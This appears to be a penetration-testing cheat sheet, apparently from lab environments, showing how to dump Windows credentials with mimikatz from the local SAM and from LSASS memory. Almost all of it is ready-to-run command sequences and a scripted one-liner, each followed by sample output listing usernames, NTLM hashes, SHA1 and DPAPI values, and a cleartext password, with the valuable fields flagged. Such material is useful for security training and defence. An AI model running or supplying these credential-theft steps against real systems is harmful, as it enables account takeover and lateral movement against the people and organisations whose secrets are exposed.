mimikatz
Extracting NTLM
hashes from local SAM
This method will only allow you to get hashes from local users on the machine. No domain user's hashes will be available.
mimikatz.exe
|->
mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> lsadump::sam
|->
RID : 000001f4 (500)
User : Administrator <- 🔥
Hash NTLM: 145e02c50333951f71d13c245d352b50 <- 🔥
hashes from LSASS memory
This method will let you extract any NTLM hashes for local users and any domain user that has recently logged onto the machine.
sekurlsa::msv
mimikatz.exe
|->
mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> sekurlsa::msv
|->
Authentication Id : 0 ; 308124 (00000000:0004b39c)
Session : RemoteInteractive from 2
User Name : bob.jenkins <- 🔥
Domain : ZA
Logon Server : THMDC
Logon Time : 2022/04/22 09:55:02
SID : S-1-5-21-3330634377-1326264276-632209373-4605
msv :
[00000003] Primary
* Username : bob.jenkins
* Domain : ZA
* NTLM : 6b4a57f67805a663c818106dc0648484 <- 🔥
sekurlsa::logonPasswords /full
./mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonPasswords /full" "exit" > mimikatz.dump3.txt
mimikatz.exe
|->
mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> sekurlsa::logonPasswords /full
|->
Authentication Id : 0 ; 313544 (00000000:0004c8c8)
Session : Service from 0
User Name : joe
Domain : MEDTECH
Logon Server : DC01
Logon Time : 5/3/2023 4:15:16 PM
SID : S-1-5-21-976142013-3766213998-138799841-1106
msv :
[00000003] Primary
* Username : joe <- 🔥
* Domain : MEDTECH
* NTLM : 08d7a47a6f9f66b97b1bae4178747494 <- 🔥
* SHA1 : a0c2285bfad20cc614e2d361d6246579843557cd
* DPAPI : 58de53296298ce0f98087ae902c88735
tspkg :
wdigest :
* Username : joe
* Domain : MEDTECH
* Password : (null)
kerberos :
* Username : joe
* Domain : MEDTECH.COM
* Password : Flowers1 <- 🔥